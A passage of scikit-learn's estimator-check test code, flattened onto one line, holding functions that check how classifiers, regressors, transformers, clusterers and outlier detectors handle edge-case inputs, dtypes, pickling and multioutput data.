np.random.RandomState(0) X = 3 * rnd.uniform(size=(1, 10)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) # min_cluster_size cannot be less than the data size for OPTICS. if name == 'OPTICS': estimator.set_params(min_samples=1) msgs = ["1 sample", "n_samples = 1", "n_samples=1", "one sample", "1 class", "one class"] try: estimator.fit(X, y) except ValueError as e: if all(msg not in repr(e) for msg in msgs): raise e @ignore_warnings def check_fit2d_1feature(name, estimator_orig, strict_mode=True): # check fitting a 2d array with only 1 feature either works or returns # informative message rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(10, 1)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 # ensure two labels in subsample for RandomizedLogisticRegression if name == 'RandomizedLogisticRegression': estimator.sample_fraction = 1 # ensure non skipped trials for RANSACRegressor if name == 'RANSACRegressor': estimator.residual_threshold = 0.5 y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator, 1) msgs = ["1 feature(s)", "n_features = 1", "n_features=1"] try: estimator.fit(X, y) except ValueError as e: if all(msg not in repr(e) for msg in msgs): raise e @ignore_warnings def check_fit1d(name, estimator_orig, strict_mode=True): # check fitting 1d X array raises a ValueError rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20)) y = X.astype(int) estimator = clone(estimator_orig) tags = estimator._get_tags() if tags["no_validation"]: # FIXME this is a bit loose return y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) assert_raises(ValueError, estimator.fit, X, y) @ignore_warnings(category=FutureWarning) def check_transformer_general(name, transformer, readonly_memmap=False, strict_mode=True): X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X = StandardScaler().fit_transform(X) X -= X.min() X = _pairwise_estimator_convert_X(X, transformer) if readonly_memmap: X, y = create_memmap_backed_data([X, y]) _check_transformer(name, transformer, X, y) @ignore_warnings(category=FutureWarning) def check_transformer_data_not_an_array(name, transformer, strict_mode=True): X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X = StandardScaler().fit_transform(X) # We need to make sure that we have non negative data, for things # like NMF X -= X.min() - .1 X = _pairwise_estimator_convert_X(X, transformer) this_X = _NotAnArray(X) this_y = _NotAnArray(np.asarray(y)) _check_transformer(name, transformer, this_X, this_y) # try the same with some list _check_transformer(name, transformer, X.tolist(), y.tolist()) @ignore_warnings(category=FutureWarning) def check_transformers_unfitted(name, transformer, strict_mode=True): X, y = _regression_dataset() transformer = clone(transformer) with assert_raises((AttributeError, ValueError), msg="The unfitted " "transformer {} does not raise an error when " "transform is called. Perhaps use " "check_is_fitted in transform.".format(name)): transformer.transform(X) def _check_transformer(name, transformer_orig, X, y, strict_mode=True): n_samples, n_features = np.asarray(X).shape transformer = clone(transformer_orig) set_random_state(transformer) # fit if name in CROSS_DECOMPOSITION: y_ = np.c_[np.asarray(y), np.asarray(y)] y_[::2, 1] *= 2 if isinstance(X, _NotAnArray): y_ = _NotAnArray(y_) else: y_ = y transformer.fit(X, y_) # fit_transform method should work on non fitted estimator transformer_clone = clone(transformer) X_pred = transformer_clone.fit_transform(X, y=y_) if isinstance(X_pred, tuple): for x_pred in X_pred: assert x_pred.shape[0] == n_samples else: # check for consistent n_samples assert X_pred.shape[0] == n_samples if hasattr(transformer, 'transform'): if name in CROSS_DECOMPOSITION: X_pred2 = transformer.transform(X, y_) X_pred3 = transformer.fit_transform(X, y=y_) else: X_pred2 = transformer.transform(X) X_pred3 = transformer.fit_transform(X, y=y_) if transformer_orig._get_tags()['non_deterministic']: msg = name + ' is non deterministic' raise SkipTest(msg) if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple): for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3): assert_allclose_dense_sparse( x_pred, x_pred2, atol=1e-2, err_msg="fit_transform and transform outcomes " "not consistent in %s" % transformer) assert_allclose_dense_sparse( x_pred, x_pred3, atol=1e-2, err_msg="consecutive fit_transform outcomes " "not consistent in %s" % transformer) else: assert_allclose_dense_sparse( X_pred, X_pred2, err_msg="fit_transform and transform outcomes " "not consistent in %s" % transformer, atol=1e-2) assert_allclose_dense_sparse( X_pred, X_pred3, atol=1e-2, err_msg="consecutive fit_transform outcomes " "not consistent in %s" % transformer) assert _num_samples(X_pred2) == n_samples assert _num_samples(X_pred3) == n_samples # raises error on malformed input for transform if hasattr(X, 'shape') and \ not transformer._get_tags()["stateless"] and \ X.ndim == 2 and X.shape[1] > 1: # If it's not an array, it does not have a 'T' property with assert_raises(ValueError, msg="The transformer {} does " "not raise an error when the number of " "features in transform is different from" " the number of features in " "fit.".format(name)): transformer.transform(X[:, :-1]) @ignore_warnings def check_pipeline_consistency(name, estimator_orig, strict_mode=True): if estimator_orig._get_tags()['non_deterministic']: msg = name + ' is non deterministic' raise SkipTest(msg) # check that make_pipeline(est) gives same score as est X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X -= X.min() X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) pipeline = make_pipeline(estimator) estimator.fit(X, y) pipeline.fit(X, y) funcs = ["score", "fit_transform"] for func_name in funcs: func = getattr(estimator, func_name, None) if func is not None: func_pipeline = getattr(pipeline, func_name) result = func(X, y) result_pipe = func_pipeline(X, y) assert_allclose_dense_sparse(result, result_pipe) @ignore_warnings def check_fit_score_takes_y(name, estimator_orig, strict_mode=True): # check that all estimators accept an optional y # in fit and score so they can be used in pipelines rnd = np.random.RandomState(0) n_samples = 30 X = rnd.uniform(size=(n_samples, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = np.arange(n_samples) % 3 estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) funcs = ["fit", "score", "partial_fit", "fit_predict", "fit_transform"] for func_name in funcs: func = getattr(estimator, func_name, None) if func is not None: func(X, y) args = [p.name for p in signature(func).parameters.values()] if args[0] == "self": # if_delegate_has_method makes methods into functions # with an explicit "self", so need to shift arguments args = args[1:] assert args[1] in ["y", "Y"], ( "Expected y or Y as second argument for method " "%s of %s. Got arguments: %r." % (func_name, type(estimator).__name__, args)) @ignore_warnings def check_estimators_dtypes(name, estimator_orig, strict_mode=True): rnd = np.random.RandomState(0) X_train_32 = 3 * rnd.uniform(size=(20, 5)).astype(np.float32) X_train_32 = _pairwise_estimator_convert_X(X_train_32, estimator_orig) X_train_64 = X_train_32.astype(np.float64) X_train_int_64 = X_train_32.astype(np.int64) X_train_int_32 = X_train_32.astype(np.int32) y = X_train_int_64[:, 0] y = _enforce_estimator_tags_y(estimator_orig, y) methods = ["predict", "transform", "decision_function", "predict_proba"] for X_train in [X_train_32, X_train_64, X_train_int_64, X_train_int_32]: estimator = clone(estimator_orig) set_random_state(estimator, 1) estimator.fit(X_train, y) for method in methods: if hasattr(estimator, method): getattr(estimator, method)(X_train) def check_transformer_preserve_dtypes( name, transformer_orig, strict_mode=True ): # check that dtype are preserved meaning if input X is of some dtype # X_transformed should be from the same dtype. X, y = make_blobs( n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, cluster_std=0.1, ) X = StandardScaler().fit_transform(X) X -= X.min() X = _pairwise_estimator_convert_X(X, transformer_orig) for dtype in transformer_orig._get_tags()["preserves_dtype"]: X_cast = X.astype(dtype) transformer = clone(transformer_orig) set_random_state(transformer) X_trans = transformer.fit_transform(X_cast, y) if isinstance(X_trans, tuple): # cross-decompostion returns a tuple of (x_scores, y_scores) # when given y with fit_transform; only check the first element X_trans = X_trans[0] # check that the output dtype is preserved assert X_trans.dtype == dtype, ( f'Estimator transform dtype: {X_trans.dtype} - ' f'original/expected dtype: {dtype.__name__}' ) @ignore_warnings(category=FutureWarning) def check_estimators_empty_data_messages(name, estimator_orig, strict_mode=True): e = clone(estimator_orig) set_random_state(e, 1) X_zero_samples = np.empty(0).reshape(0, 3) # The precise message can change depending on whether X or y is # validated first. Let us test the type of exception only: with assert_raises(ValueError, msg="The estimator {} does not" " raise an error when an empty data is used " "to train. Perhaps use " "check_array in train.".format(name)): e.fit(X_zero_samples, []) X_zero_features = np.empty(0).reshape(3, 0) # the following y should be accepted by both classifiers and regressors # and ignored by unsupervised models y = _enforce_estimator_tags_y(e, np.array([1, 0, 1])) msg = (r"0 feature\(s\) \(shape=\(3, 0\)\) while a minimum of \d* " "is required.") assert_raises_regex(ValueError, msg, e.fit, X_zero_features, y) @ignore_warnings(category=FutureWarning) def check_estimators_nan_inf(name, estimator_orig, strict_mode=True): # Checks that Estimator X's do not contain NaN or inf. rnd = np.random.RandomState(0) X_train_finite = _pairwise_estimator_convert_X(rnd.uniform(size=(10, 3)), estimator_orig) X_train_nan = rnd.uniform(size=(10, 3)) X_train_nan[0, 0] = np.nan X_train_inf = rnd.uniform(size=(10, 3)) X_train_inf[0, 0] = np.inf y = np.ones(10) y[:5] = 0 y = _enforce_estimator_tags_y(estimator_orig, y) error_string_fit = "Estimator doesn't check for NaN and inf in fit." error_string_predict = ("Estimator doesn't check for NaN and inf in" " predict.") error_string_transform = ("Estimator doesn't check for NaN and inf in" " transform.") for X_train in [X_train_nan, X_train_inf]: # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) set_random_state(estimator, 1) # try to fit try: estimator.fit(X_train, y) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_fit, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_fit, estimator, exc) traceback.print_exc(file=sys.stdout) raise exc else: raise AssertionError(error_string_fit, estimator) # actually fit estimator.fit(X_train_finite, y) # predict if hasattr(estimator, "predict"): try: estimator.predict(X_train) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_predict, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_predict, estimator, exc) traceback.print_exc(file=sys.stdout) else: raise AssertionError(error_string_predict, estimator) # transform if hasattr(estimator, "transform"): try: estimator.transform(X_train) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_transform, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_transform, estimator, exc) traceback.print_exc(file=sys.stdout) else: raise AssertionError(error_string_transform, estimator) @ignore_warnings def check_nonsquare_error(name, estimator_orig, strict_mode=True): """Test that error is thrown when non-square data provided.""" X, y = make_blobs(n_samples=20, n_features=10) estimator = clone(estimator_orig) with assert_raises(ValueError, msg="The pairwise estimator {}" " does not raise an error on non-square data" .format(name)): estimator.fit(X, y) @ignore_warnings def check_estimators_pickle(name, estimator_orig, strict_mode=True): """Test that we can pickle all estimators.""" check_methods = ["predict", "transform", "decision_function", "predict_proba"] X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) # some estimators can't do features less than 0 X -= X.min() X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel) tags = estimator_orig._get_tags() # include NaN values when the estimator should deal with them if tags['allow_nan']: # set randomly 10 elements to np.nan rng = np.random.RandomState(42) mask = rng.choice(X.size, 10, replace=False) X.reshape(-1)[mask] = np.nan estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) estimator.fit(X, y) # pickle and unpickle! pickled_estimator = pickle.dumps(estimator) if estimator.__module__.startswith('sklearn.'): assert b"version" in pickled_estimator unpickled_estimator = pickle.loads(pickled_estimator) result = dict() for method in check_methods: if hasattr(estimator, method): result[method] = getattr(estimator, method)(X) for method in result: unpickled_result = getattr(unpickled_estimator, method)(X) assert_allclose_dense_sparse(result[method], unpickled_result) @ignore_warnings(category=FutureWarning) def check_estimators_partial_fit_n_features(name, estimator_orig, strict_mode=True): # check if number of features changes between calls to partial_fit. if not hasattr(estimator_orig, 'partial_fit'): return estimator = clone(estimator_orig) X, y = make_blobs(n_samples=50, random_state=1) X -= X.min() y = _enforce_estimator_tags_y(estimator_orig, y) try: if is_classifier(estimator): classes = np.unique(y) estimator.partial_fit(X, y, classes=classes) else: estimator.partial_fit(X, y) except NotImplementedError: return with assert_raises(ValueError, msg="The estimator {} does not raise an" " error when the number of features" " changes between calls to " "partial_fit.".format(name)): estimator.partial_fit(X[:, :-1], y) @ignore_warnings(category=FutureWarning) def check_classifier_multioutput(name, estimator, strict_mode=True): n_samples, n_labels, n_classes = 42, 5, 3 tags = estimator._get_tags() estimator = clone(estimator) X, y = make_multilabel_classification(random_state=42, n_samples=n_samples, n_labels=n_labels, n_classes=n_classes) estimator.fit(X, y) y_pred = estimator.predict(X) assert y_pred.shape == (n_samples, n_classes), ( "The shape of the prediction for multioutput data is " "incorrect. Expected {}, got {}." .format((n_samples, n_labels), y_pred.shape)) assert y_pred.dtype.kind == 'i' if hasattr(estimator, "decision_function"): decision = estimator.decision_function(X) assert isinstance(decision, np.ndarray) assert decision.shape == (n_samples, n_classes), ( "The shape of the decision function output for " "multioutput data is incorrect. Expected {}, got {}." .format((n_samples, n_classes), decision.shape)) dec_pred = (decision > 0).astype(int) dec_exp = estimator.classes_[dec_pred] assert_array_equal(dec_exp, y_pred) if hasattr(estimator, "predict_proba"): y_prob = estimator.predict_proba(X) if isinstance(y_prob, list) and not tags['poor_score']: for i in range(n_classes): assert y_prob[i].shape == (n_samples, 2), ( "The shape of the probability for multioutput data is" " incorrect. Expected {}, got {}." .format((n_samples, 2), y_prob[i].shape)) assert_array_equal( np.argmax(y_prob[i], axis=1).astype(int), y_pred[:, i] ) elif not tags['poor_score']: assert y_prob.shape == (n_samples, n_classes), ( "The shape of the probability for multioutput data is" " incorrect. Expected {}, got {}." .format((n_samples, n_classes), y_prob.shape)) assert_array_equal(y_prob.round().astype(int), y_pred) if (hasattr(estimator, "decision_function") and hasattr(estimator, "predict_proba")): for i in range(n_classes): y_proba = estimator.predict_proba(X)[:, i] y_decision = estimator.decision_function(X) assert_array_equal(rankdata(y_proba), rankdata(y_decision[:, i])) @ignore_warnings(category=FutureWarning) def check_regressor_multioutput(name, estimator, strict_mode=True): estimator = clone(estimator) n_samples = n_features = 10 if not _is_pairwise_metric(estimator): n_samples = n_samples + 1 X, y = make_regression(random_state=42, n_targets=5, n_samples=n_samples, n_features=n_features) X = _pairwise_estimator_convert_X(X, estimator) estimator.fit(X, y) y_pred = estimator.predict(X) assert y_pred.dtype == np.dtype('float64'), ( "Multioutput predictions by a regressor are expected to be" " floating-point precision. Got {} instead".format(y_pred.dtype)) assert y_pred.shape == y.shape, ( "The shape of the orediction for multioutput data is incorrect." " Expected {}, got {}.") @ignore_warnings(category=FutureWarning) def check_clustering(name, clusterer_orig, readonly_memmap=False, strict_mode=True): clusterer = clone(clusterer_orig) X, y = make_blobs(n_samples=50, random_state=1) X, y = shuffle(X, y, random_state=7) X = StandardScaler().fit_transform(X) rng = np.random.RandomState(7) X_noise = np.concatenate([X, rng.uniform(low=-3, high=3, size=(5, 2))]) if readonly_memmap: X, y, X_noise = create_memmap_backed_data([X, y, X_noise]) n_samples, n_features = X.shape # catch deprecation and neighbors warnings if hasattr(clusterer, "n_clusters"): clusterer.set_params(n_clusters=3) set_random_state(clusterer) if name == 'AffinityPropagation': clusterer.set_params(preference=-100) clusterer.set_params(max_iter=100) # fit clusterer.fit(X) # with lists clusterer.fit(X.tolist()) pred = clusterer.labels_ assert pred.shape == (n_samples,) assert adjusted_rand_score(pred, y) > 0.4 if clusterer._get_tags()['non_deterministic']: return set_random_state(clusterer) with warnings.catch_warnings(record=True): pred2 = clusterer.fit_predict(X) assert_array_equal(pred, pred2) # fit_predict(X) and labels_ should be of type int assert pred.dtype in [np.dtype('int32'), np.dtype('int64')] assert pred2.dtype in [np.dtype('int32'), np.dtype('int64')] # Add noise to X to test the possible values of the labels labels = clusterer.fit_predict(X_noise) # There should be at least one sample in every cluster. Equivalently # labels_ should contain all the consecutive values between its # min and its max. labels_sorted = np.unique(labels) assert_array_equal(labels_sorted, np.arange(labels_sorted[0], labels_sorted[-1] + 1)) # Labels are expected to start at 0 (no noise) or -1 (if noise) assert labels_sorted[0] in [0, -1] # Labels should be less than n_clusters - 1 if hasattr(clusterer, 'n_clusters'): n_clusters = getattr(clusterer, 'n_clusters') assert n_clusters - 1 >= labels_sorted[-1] # else labels should be less than max(labels_) which is necessarily true @ignore_warnings(category=FutureWarning) def check_clusterer_compute_labels_predict(name, clusterer_orig, strict_mode=True): """Check that predict is invariant of compute_labels.""" X, y = make_blobs(n_samples=20, random_state=0) clusterer = clone(clusterer_orig) set_random_state(clusterer) if hasattr(clusterer, "compute_labels"): # MiniBatchKMeans X_pred1 = clusterer.fit(X).predict(X) clusterer.set_params(compute_labels=False) X_pred2 = clusterer.fit(X).predict(X) assert_array_equal(X_pred1, X_pred2) @ignore_warnings(category=FutureWarning) def check_classifiers_one_label(name, classifier_orig, strict_mode=True): error_string_fit = "Classifier can't train when only one class is present." error_string_predict = ("Classifier can't predict when only one class is " "present.") rnd = np.random.RandomState(0) X_train = rnd.uniform(size=(10, 3)) X_test = rnd.uniform(size=(10, 3)) y = np.ones(10) # catch deprecation warnings with ignore_warnings(category=FutureWarning): classifier = clone(classifier_orig) # try to fit try: classifier.fit(X_train, y) except ValueError as e: if 'class' not in repr(e): print(error_string_fit, classifier, e) traceback.print_exc(file=sys.stdout) raise e else: return except Exception as exc: print(error_string_fit, classifier, exc) traceback.print_exc(file=sys.stdout) raise exc # predict try: assert_array_equal(classifier.predict(X_test), y) except Exception as exc: print(error_string_predict, classifier, exc) raise exc @ignore_warnings # Warnings are raised by decision function def check_classifiers_train(name, classifier_orig, readonly_memmap=False, X_dtype='float64', strict_mode=True): X_m, y_m = make_blobs(n_samples=300, random_state=0) X_m = X_m.astype(X_dtype) X_m, y_m = shuffle(X_m, y_m, random_state=7) X_m = StandardScaler().fit_transform(X_m) # generate binary problem from multi-class one y_b = y_m[y_m != 2] X_b = X_m[y_m != 2] if name in ['BernoulliNB', 'MultinomialNB', 'ComplementNB', 'CategoricalNB']: X_m -= X_m.min() X_b -= X_b.min() if readonly_memmap: X_m, y_m, X_b, y_b = create_memmap_backed_data([X_m, y_m, X_b, y_b]) problems = [(X_b, y_b)] tags = classifier_orig._get_tags() if not tags['binary_only']: problems.append((X_m, y_m)) for (X, y) in problems: classes = np.unique(y) n_classes = len(classes) n_samples, n_features = X.shape classifier = clone(classifier_orig) X = _pairwise_estimator_convert_X(X, classifier) y = _enforce_estimator_tags_y(classifier, y) set_random_state(classifier) # raises error on malformed input for fit if not tags["no_validation"]: with assert_raises( ValueError, msg="The classifier {} does not " "raise an error when incorrect/malformed input " "data for fit is passed. The number of training " "examples is not the same as the number of labels. " "Perhaps use check_X_y in fit.".format(name)): classifier.fit(X, y[:-1]) # fit classifier.fit(X, y) # with lists classifier.fit(X.tolist(), y.tolist()) assert hasattr(classifier, "classes_") y_pred = classifier.predict(X) assert y_pred.shape == (n_samples,) # training set performance if not tags['poor_score']: assert accuracy_score(y, y_pred) > 0.83 # raises error on malformed input for predict msg_pairwise = ( "The classifier {} does not raise an error when shape of X in " " {} is not equal to (n_test_samples, n_training_samples)") msg = ("The classifier {} does not raise an error when the number of " "features in {} is different from the number of features in " "fit.") if not tags["no_validation"]: if _is_pairwise(classifier): with assert_raises(ValueError, msg=msg_pairwise.format(name, "predict")): classifier.predict(X.reshape(-1, 1)) else: with assert_raises(ValueError, msg=msg.format(name, "predict")): classifier.predict(X.T) if hasattr(classifier, "decision_function"): try: # decision_function agrees with predict decision = classifier.decision_function(X) if n_classes == 2: if not tags["multioutput_only"]: assert decision.shape == (n_samples,) else: assert decision.shape == (n_samples, 1) dec_pred = (decision.ravel() > 0).astype(int) assert_array_equal(dec_pred, y_pred) else: assert decision.shape == (n_samples, n_classes) assert_array_equal(np.argmax(decision, axis=1), y_pred) # raises error on malformed input for decision_function if not tags["no_validation"]: if _is_pairwise(classifier): with assert_raises(ValueError, msg=msg_pairwise.format( name, "decision_function")): classifier.decision_function(X.reshape(-1, 1)) else: with assert_raises(ValueError, msg=msg.format( name, "decision_function")): classifier.decision_function(X.T) except NotImplementedError: pass if hasattr(classifier, "predict_proba"): # predict_proba agrees with predict y_prob = classifier.predict_proba(X) assert y_prob.shape == (n_samples, n_classes) assert_array_equal(np.argmax(y_prob, axis=1), y_pred) # check that probas for all classes sum to one assert_array_almost_equal(np.sum(y_prob, axis=1), np.ones(n_samples)) if not tags["no_validation"]: # raises error on malformed input for predict_proba if _is_pairwise(classifier_orig): with assert_raises(ValueError, msg=msg_pairwise.format( name, "predict_proba")): classifier.predict_proba(X.reshape(-1, 1)) else: with assert_raises(ValueError, msg=msg.format( name, "predict_proba")): classifier.predict_proba(X.T) if hasattr(classifier, "predict_log_proba"): # predict_log_proba is a transformation of predict_proba y_log_prob = classifier.predict_log_proba(X) assert_allclose(y_log_prob, np.log(y_prob), 8, atol=1e-9) assert_array_equal(np.argsort(y_log_prob), np.argsort(y_prob)) def check_outlier_corruption(num_outliers, expected_outliers, decision, strict_mode=True): # Check for deviation from the precise given contamination level that may # be due to ties in the anomaly scores. if num_outliers < expected_outliers: start = num_outliers end = expected_outliers + 1 else: start = expected_outliers end = num_outliers + 1 # ensure that all values in the 'critical area' are tied, # leading to the observed discrepancy between provided # and actual contamination levels. sorted_decision = np.sort(decision) msg = ('The number of predicted outliers is not equal to the expected ' 'number of outliers and this difference is not explained by the ' 'number of ties in the decision_function values') assert len(np.unique(sorted_decision[start:end])) == 1, msg def check_outliers_train(name, estimator_orig, readonly_memmap=True, strict_mode=True): n_samples = 300 X, _ = make_blobs(n_samples=n_samples, random_state=0) X = shuffle(X, random_state=7) if readonly_memmap: X = create_memmap_backed_data(X) n_samples, n_features = X.shape estimator = clone(estimator_orig) set_random_state(estimator) # fit estimator.fit(X) # with lists estimator.fit(X.tolist()) y_pred = estimator.predict(X) assert y_pred.shape == (n_samples,) assert y_pred.dtype.kind == 'i' assert_array_equal(np.unique(y_pred), np.array([-1, 1])) decision = estimator.decision_function(X) scores = estimator.score_samples(X) for output in [decision, scores]: assert output.dtype == np.dtype('float') assert output.shape == (n_samples,) # raises error on malformed input for predict assert_raises(ValueError, estimator.predict, X.T) # decision_function agrees with predict dec_pred = (decision >= 0).astype(int) dec_pred[dec_pred == 0] = -1 assert_array_equal(dec_pred, y_pred) # raises error on malformed input for decision_function assert_raises(ValueError, estimator.decision_function, X.T) # decision_function is a translation of score_samples y_dec = scores - estimator.offset_ assert_allclose(y_dec, decision) # raises error on malformed input for score_samples assert_raises(ValueError, estimator.score_samples, X.T) # contamination parameter (not for OneClassSVM which has the nu parameter) if (hasattr(estimator, 'contamination') and not hasattr(estimator, 'novelty')): # proportion of outliers equal to contamination parameter when not # set to 'auto'. This is true for the training set and cannot thus be # checked as follows for estimators with a novelty parameter such as # LocalOutlierFactor (tested in check_outliers_fit_predict) expected_outliers = 30 contamination = expected_outliers / n_samples estimator.set_params(contamination=contamination) estimator.fit(X) y_pred = estimator.predict(X) num_outliers = np.sum(y_pred != 1) # num_outliers should be equal to expected_outliers unless # there are ties in the decision_function values. this can # only be tested for estimators with a decision_function # method, i.e. all estimators except LOF which is already # excluded from this if branch. if num_outliers != expected_outliers: decision = estimator.decision_function(X) check_outlier_corruption(num_outliers, expected_outliers, decision) # raises error when contamination is a scalar and not in [0,1] for contamination in [-0.5, 2.3]: estimator.set_params(contamination=contamination) assert_raises(ValueError, estimator.fit, X) @ignore_warnings(category=(FutureWarning)) def check_classifiers_multilabel_representation_invariance( name, classifier_orig, strict_mode=True): X, y = make_multilabel_classification(n_samples=100, n_features=20, n_classes=5, n_labels=3, length=50, allow_unlabeled=True, random_state=0) X_train, y_train = X[:80], y[:80] X_test = X[80:] y_train_list_of_lists = y_train.tolist() y_train_list_of_arrays = list(y_train) classifier = clone(classifier_orig) set_random_state(classifier) y_pred = classifier.fit(X_train, y_train).predict(X_test) y_pred_list_of_lists = classifier.fit( X_train, y_train_list_of_lists).predict(X_test) y_pred_list_of_arrays = classifier.fit( X_train, y_train_list_of_arrays).predict(X_test) assert_array_equal(y_pred, y_pred_list_of_arrays) assert_array_equal(y_pred, y_pred_list_of_lists) assert y_pred.dtype == y_pred_list_of_arrays.dtype assert y_pred.dtype == y_pred_list_of_lists.dtype assert type(y_pred) == type(y_pred_list_of_arrays) assert type(y_pred) == type(y_pred_list_of_lists) @ignore_warnings(category=FutureWarning) def check_estimators_fit_returns_self(name, estimator_orig, readonly_memmap=False, strict_mode=True): """Check if self is returned when calling fit.""" X, y = make_blobs(random_state=0, n_samples=21) # some want non-negative input X -= X.min() X = _pairwise_estimator_convert_X(X, estimator_orig) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if readonly_memmap: X, y = create_memmap_backed_data([X, y]) set_random_state(estimator) assert estimator.fit(X, y) is estimator @ignore_warnings def check_estimators_unfitted(name, estimator_orig, strict_mode=True): """Check that predict raises an exception in an unfitted estimator. Unfitted estimators should raise a NotFittedError. """ # Common test for Regressors, Classifiers and Outlier detection estimators X, y = _regression_dataset() estimator = clone(estimator_orig) for method in ('decision_function', 'predict', 'predict_proba', 'predict_log_proba'): if hasattr(estimator, method): assert_raises(NotFittedError, getattr(estimator, method), X) @ignore_warnings(category=FutureWarning) def check_supervised_y_2d(name, estimator_orig, strict_mode=True): tags = estimator_orig._get_tags() if tags['multioutput_only']: # These only work on 2d, so this test makes no sense return rnd = np.random.RandomState(0) n_samples = 30 X = _pairwise_estimator_convert_X( rnd.uniform(size=(n_samples, 3)), estimator_orig ) y = np.arange(n_samples) % 3 y = _enforce_estimator_tags_y(estimator_orig, y) estimator = clone(estimator_orig) set_random_state(estimator) # fit estimator.fit(X, y) y_pred = estimator.predict(X) set_random_state(estimator) # Check that when a 2D y is given, a DataConversionWarning is # raised with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always", DataConversionWarning) warnings.simplefilter("ignore", RuntimeWarning) estimator.fit(X, y[:, np.newaxis]) y_pred_2d = estimator.predict(X) msg = "expected 1 DataConversionWarning, got: %s" % ( ", ".join([str(w_x) for w_x in w])) if not tags['multioutput']: # check that we warned if we don't support multi-output assert len(w) > 0, msg assert "DataConversionWarning('A column-vector y" \ " was passed when a 1d array was expected" in msg assert_allclose(y_pred.ravel(), y_pred_2d.ravel()) @ignore_warnings def check_classifiers_predictions(X, y, name, classifier_orig, strict_mode=True): classes = np.unique(y) classifier = clone(classifier_orig) if name == 'BernoulliNB': X = X > X.mean() set_random_state(classifier) classifier.fit(X, y) y_pred = classifier.predict(X) if hasattr(classifier, "decision_function"): decision = classifier.decision_function(X) assert isinstance(decision, np.ndarray) if len(classes) == 2: dec_pred = (decision.ravel() > 0).astype(int) dec_exp = classifier.classes_[dec_pred] assert_array_equal(dec_exp, y_pred, err_msg="decision_function does not match " "classifier for %r: expected '%s', got '%s'" % (classifier, ", ".join(map(str, dec_exp)), ", ".join(map(str, y_pred)))) elif getattr(classifier, 'decision_function_shape', 'ovr') == 'ovr': decision_y = np.argmax(decision, axis=1).astype(int) y_exp = classifier.classes_[decision_y] assert_array_equal(y_exp, y_pred, err_msg="decision_function does not match " "classifier for %r: expected '%s', got '%s'" % (classifier, ", ".join(map(str, y_exp)), ", ".join(map(str, y_pred)))) # training set performance if name != "ComplementNB": # This is a pathological data set for ComplementNB. # For some specific cases 'ComplementNB' predicts less classes # than expected assert_array_equal(np.unique(y), np.unique(y_pred)) assert_array_equal(classes, classifier.classes_, err_msg="Unexpected classes_ attribute for %r: " "expected '%s', got '%s'" % (classifier, ", ".join(map(str, classes)), ", ".join(map(str, classifier.classes_)))) def _choose_check_classifiers_labels(name, y, y_names): return y if name in ["LabelPropagation", "LabelSpreading"] else y_names def check_classifiers_classes(name, classifier_orig, strict_mode=True): X_multiclass, y_multiclass = make_blobs(n_samples=30, random_state=0, cluster_std=0.1) X_multiclass, y_multiclass = shuffle(X_multiclass, y_multiclass, random_state=7) X_multiclass = StandardScaler().fit_transform(X_multiclass) # We need to make sure that we have non negative data, for things # like NMF X_multiclass -= X_multiclass.min() - .1 X_binary = X_multiclass[y_multiclass != 2] y_binary = y_multiclass[y_multiclass != 2] X_multiclass = _pairwise_estimator_convert_X(X_multiclass, classifier_orig) X_binary = _pairwise_estimator_convert_X(X_binary, classifier_orig) labels_multiclass = ["one", "two", "three"] labels_binary = ["one", "two"] y_names_multiclass = np.take(labels_multiclass, y_multiclass) y_names_binary = np.take(labels_binary, y_binary) problems = [(X_binary, y_binary, y_names_binary)] if not classifier_orig._get_tags()['binary_only']: problems.append((X_multiclass, y_multiclass, y_names_multiclass)) for X, y, y_names in problems: for y_names_i in [y_names, y_names.astype('O')]: y_ = _choose_check_classifiers_labels(name, y, y_names_i) check_classifiers_predictions(X, y_, name, classifier_orig) labels_binary = [-1, 1] y_names_binary = np.take(labels_binary, y_binary) y_binary = _choose_check_classifiers_labels(name, y_binary, y_names_binary) check_classifiers_predictions(X_binary, y_binary, name, classifier_orig) 